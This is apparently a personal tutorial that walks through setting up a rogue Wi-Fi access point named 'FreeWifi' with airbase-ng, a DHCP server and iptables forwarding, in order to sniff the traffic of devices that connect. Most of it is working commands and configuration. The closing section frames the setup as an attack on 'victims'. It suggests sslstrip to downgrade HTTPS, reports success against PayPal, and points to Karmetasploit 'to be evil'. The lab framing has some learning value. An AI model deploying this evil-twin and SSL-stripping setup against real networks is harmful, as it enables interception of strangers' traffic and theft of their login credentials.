The purpose of this tutorial was to create a fake access point in my lab in order to redirect the connecting devices traffic through it and analyze the traffic.
I used my Lenovo x230 notebook with the built-in wifi card to connect to my router. I used a second USB wifi card to act as a fake AP. I used Backtrack 5 R3 x64 Gnome operating system.
My cable router IP address is: 192.168.22.1
My network interface connected to the router is: wlan0
My fake AP IP address will be: 10.0.0.1
My network interface which will be the fake AP: wlan2
We need several things in order to perform the task:
Set up the DHCP server
Get the server package from repository, stop it after install, save a backup of original configuration and create our own config file:
apt-get install dhcp3-server /etc/init.d/dhcpd stop cd /etc/dhcp3/ cp dhcpd.conf dhcpd.conf.orig nano /etc/dhcp3/dhcpd.conf
Put the following contents into the file:
default-lease-time 60; max-lease-time 72; ddns-update-style none; authoritative; #log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option subnet-mask 255.255.255.0; option broadcast-address 10.0.0.255; option routers 10.0.0.1; option domain-name-servers 192.168.22.1; }
I also like to remove DHCP from autostart:
update-rc.d -f dhcp3-server removeNow we are ready to go. First we need to restart our wireless adapter in monitor mode. To do so, we first stop the interface, then use airmon-ng to restart it in monitor mode. Then, we utilize airbase-ng to start a new network.
airmon-ng airmon-ng start wlan2 airbase-ng -e "FreeWifi" -c 9 mon0
-e = name of access point
-c 9 = listen on channel 9
mon0 = Our virtual monitor mode interface
Airbase-ng creates an interface named "at0" tap so you have to configure it and set the mtu size.
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1400
Now let's empty leases and start the DHCP server:
> /var/lib/dhcp3/dhcpd.leases dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.conf at0
You can check if the DHCP is running with the following command:
ps aux | grep dhcpd
Result should be something like this:
OUTPUT: dhcpd 2956 0.0 0.0 19632 3008 ? Ss 11:00 0:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf mon0
Now in a new window I like to see the leased IP addresses:
tail -f /var/log/messages|grep dhcpd
!!!If you don't want to flush your firewall, just skip the flash commands section.!!!
Run the following commands to flush all ip-tables and setup new ones.
iptables -F iptables -t nat -F iptables -P INPUT ACCEPT iptables -P FORWARD ACCEPT iptables -P OUTPUT ACCEPT
Add iptables rules to forward and masquerade the traffic. The second rule is just for safety, you can leave it out.
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE iptables -A FORWARD -i wlan0 -o at0 -m state --state RELATED,ESTABLISHED -j ACCEPT iptables -A FORWARD -i at0 -o wlan0 -j ACCEPT
Last step is to enable ipv4 forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
Basically we are done. You can start a sniffer of your choice (wireshark, tcpdump, dsniff...) and start having fun.
Below this point it is going to be mad...don't try this at home:)
If you want to be so bad, that you want to change the victims' HTTPS traffic to HTTP, you can use the famous SSLSTRIP tool. Frankly it did not work for me for facebook and google, but worked with paypal...before it froze again and again...maybe I need to spend some more time looking at the issue...
To be evil, follow the SSL Strip instructions:
To be evil, follow the Karmetasploit instructions: